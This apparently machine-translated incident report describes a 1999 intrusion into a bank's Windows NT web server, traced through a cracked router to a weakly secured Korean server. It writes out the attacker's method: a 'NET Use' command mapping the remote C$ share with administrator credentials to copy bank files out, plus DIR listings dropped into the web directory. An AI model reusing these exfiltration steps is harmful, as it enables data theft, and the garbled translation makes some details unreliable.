East Asian Bank Time: December 1999 The website is WindowsNT 4.0, which is one of the largest banks in this country. The website BankServer actually has two security lines, first of all, in its router's access control table (ACL), strict port filtering limit, only allows for incoming access to 80, 443, 65300, and another firewall is the world market. The largest software firewall FW, in addition to port access control, in addition to port access control, using illegal calls known to CGI bugs. On December, the system administrator YMOUSE of the Bank website suddenly discovered that there is a cmd.exe process in the task list, and there is no service related to cmd.exe on the Bankserver system. The system administrator saved the technical personnel f of this hacker chat room. F Thinking This is a typical NT system has suffered signs of intrusion. Through Email Authorization, F begins to analyze the system's security issues, from outside, in addition to WWW services, BankServer does not open any security issues. But F is a security issue in the upstream router of the site, allowing intruders to get the configuration files and crack passwords of the router. After the system administrator YMOUSE, the F is only for 3 minutes, and the access password of the router is obtained; after logging in to the router, after complex analysis, although the bank website does not have invisible communication, it is found that BankServer is being Another 139 port of another NT server Wserve is joined. Through further analysis, it confirms that someone logs in from BankServer to the C disk of Wserver. Wserveer is a Korean NT server that is not subject to any safe protection. F makes a simple scan for WSERVER, and the result is that the password of WSERVER's administrator account is extremely simple, and it can easily obtain full control of the system. More surprisingly, on this Korean server's C drive, saved an important database file from the East Asian bank mentioned above! More files are being transferred from BankServer to this Korean Wserveer! The problem has already had a preliminary outline. The invader can perform NT Shell instructions on Bank Server through some means (most likely to use the WWW service vulnerability). Although invaders can't log in to BankServer's hard drive, he invaded another NT's Server, got the administrator account of the system. Intruders pass this Bankserver's shell directive (NET Use * //xxx.xxx.xxx.xxx/c $ passwd / user: "administrator"), the WServer's C disk map is a disk letter on the Bankserver. The intruder then uses the COPY command to transmit the important files on the system to Wserver. However, since the BankServer does not have a login entry, how does the intruder browsing the file system on BankServer? How do he know which files are important data files? In order to find the answer to this question, f Please ask YMOUSE to check the web directory on BankServer. YMOUSE found that there is a suspicious ABC directory in the web directory. All the files in the directory are text files, which are x1.txt, x2.txt, x3.txt ... one by one checks these files found, these Most of the files are DIR C: /> X.TXT and DIR C: / DATA> X.TXT generated. These files can be browsed by http: //bankserver/abc/x.txt.